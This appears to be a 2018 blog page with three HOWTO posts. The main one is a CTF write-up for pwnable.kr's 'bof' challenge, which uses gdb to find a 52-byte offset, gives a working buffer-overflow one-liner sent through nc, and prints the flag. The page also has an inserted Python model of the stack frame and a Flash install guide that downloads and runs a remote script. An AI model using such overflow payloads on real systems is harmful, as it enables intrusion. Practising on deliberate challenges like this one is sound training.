Friday, December 14, 2018

HOWTO : Solution of bof at Toddler's Bottle

Toddler's Bottle is one of the CTF games at the pwnable.kr website. The challenge I am going to do is the one named bof. There are already many writeups on the internet; however, I am going to explain what I learnt from this challenge.

Website : http://pwnable.kr/play.php (Select bof)
Source Code : http://pwnable.kr/bin/bof.c
Binary : http://pwnable.kr/bin/bof

Exploit Server : pwnable.kr:9000

The source code of the bof binary is provided. I examined the source code and found out that we have to change the "key" from "0xdeadbeef" to "0xcafebabe". The "overflowme" buffer is 32 characters long. No matter what you enter into the "overflowme" buffer, the "key" does not change by itself, as it is hard coded. It is a buffer overflow challenge; however, we are not going to take control of the return address this time.



Load the binary in gdb with PEDA and run "checksec". It confirms that NX is enabled, along with other protections.

gdb -q ./bof



Run "disass main" to disassemble the "main" function.

disass main



Run "disass func" to disassemble the "func" function.

disass func



In the "func" function, the following instructions are the ones I am interested in.

0x00000649 <+29>:    lea  eax,[ebp-0x2c]
0x0000064c <+32>:    mov  DWORD PTR [esp],eax
0x0000064f <+35>:    call 0x650
0x00000654 <+40>:    cmp  DWORD PTR [ebp+0x8],0xcafebabe
0x0000065b <+47>:    jne  0x66b

In "lea eax,[ebp-0x2c]", the address "ebp-0x2c" is probably the start of the "overflowme" buffer; it is loaded into the eax register and then passed as the argument of the following call.

In "cmp DWORD PTR [ebp+0x8],0xcafebabe", the address "ebp+0x8" probably holds the value of "key", which is "0xdeadbeef".

I am going to set a breakpoint at "0x0000065b <+47>".

b *func+47



Then run the program with "r". It prompts for input, and I enter "helloworld" as the "overflowme" value.



After entering "helloworld", I am going to examine "eax" and "ebp+0x8".

x/x $ebp+0x8
x/s $eax




The result confirms what I suspected. I am going to compute the offset between the two addresses with Python. The offset is 52.



Once I have the offset, I am going to overwrite "0xdeadbeef" with "0xcafebabe" using the exploit code below. The "cat" command keeps stdin open so that the shell remains interactive.

(python -c 'print "A"*52 + "\xbe\xba\xfe\xca"'; cat -) | nc pwnable.kr 9000
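As an added example (my own Python 3 code, not the author's and not part of the challenge), here is a small model of func()'s frame as the gdb inspection above implies it: the two offsets come from the lea and cmp instructions, the saved ebp and return address values are constructed placeholders, and the unbounded copy shows that the 52 filler bytes cross the saved ebp and the return address before reaching key.

```python
import struct

# Frame offsets (relative to ebp) read from the two instructions above.
BUF_OFF = -0x2c        # lea eax,[ebp-0x2c]: start of "overflowme"
SAVED_EBP_OFF = 0x0    # caller's ebp sits at [ebp]
RET_OFF = 0x4          # return address into main sits at [ebp+4]
KEY_OFF = 0x8          # cmp DWORD PTR [ebp+0x8],...: the "key" argument


def offset_to_key(buf_off=BUF_OFF, key_off=KEY_OFF):
    """Bytes from the start of overflowme up to the key slot (52 here)."""
    return key_off - buf_off


def build_payload(new_key, offset):
    """Filler up to the key slot, then new_key in x86 little-endian order."""
    return b"A" * offset + struct.pack("<I", new_key)


class FrameModel:
    """Toy model of func()'s frame from ebp-0x2c up to the end of key."""

    def __init__(self, key=0xDEADBEEF):
        self.mem = bytearray(KEY_OFF + 4 - BUF_OFF)
        self.write_dword(SAVED_EBP_OFF, 0xBFFFF000)  # constructed placeholder
        self.write_dword(RET_OFF, 0x08048700)        # constructed placeholder
        self.write_dword(KEY_OFF, key)

    def write_dword(self, ebp_off, value):
        i = ebp_off - BUF_OFF
        self.mem[i:i + 4] = struct.pack("<I", value)

    def read_dword(self, ebp_off):
        i = ebp_off - BUF_OFF
        return struct.unpack("<I", self.mem[i:i + 4])[0]

    def gets(self, data):
        """Unbounded copy into overflowme, as gets() does; no length check."""
        data = data[:len(self.mem)]  # stay inside the modelled frame
        self.mem[:len(data)] = data


def run_overflow(new_key=0xCAFEBABE):
    """Overflow the modelled frame and report what each slot holds afterwards."""
    frame = FrameModel()
    payload = build_payload(new_key, offset_to_key())
    frame.gets(payload)
    return {"payload": payload,
            "saved_ebp": frame.read_dword(SAVED_EBP_OFF),
            "ret": frame.read_dword(RET_OFF),
            "key": frame.read_dword(KEY_OFF)}
```

The same layout shows that the saved ebp and the return address end up as 0x41414141, which is why only the key comparison, and not the return, is under control here.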



The flag is :

daddy, I just pwned a buFFer :)




That's all! See you.


Friday, December 07, 2018

HOWTO : Flash Player on Kali Linux 2018.4

Kali Linux 2018.4 does not come with the latest version of Flash Player. Since Flash Player may be vulnerable, we need to keep it updated. However, most tutorials on the internet only teach you to copy the Flash Player object file (libflashplayer.so) to /usr/lib/mozilla/plugins/. It is very hard to keep track of the latest updates this way. The following method may be the best way to install Flash Player on Kali Linux 2018.4. It works for Firefox and Chrome as well as Chromium.

Step 1 :

apt update
apt install browser-plugin-freshplayer-pepperflash pepperflashplugin-nonfree


Step 2 :

Go to https://github.com/cybernova/fireflashupdate to download fireflashupdate.sh

wget https://raw.githubusercontent.com/cybernova/fireflashupdate/master/fireflashupdate.sh

chmod +x fireflashupdate.sh
./fireflashupdate.sh


Step 3 :

To update Flash Player :

./fireflashupdate.sh

Step 4 :

You may need to change the setting in the Firefox Add-ons menu, under Plugins - Shockwave Flash, from "Ask to Activate" to "Always Activate".

That's all! See you.


Thursday, December 06, 2018

HOWTO : Virtualbox 5.2.22 on Kali Linux 2018.4

The current version of Virtualbox for Kali Linux 2018.4 is the latest version, 5.2.22. Since the official version of Virtualbox cannot be installed on Kali Linux, the Kali version has to be installed. Luckily, it is the latest version.

apt update
apt install virtualbox-dkms virtualbox-ext-pack virtualbox-guest-additions-iso


That's all! See you.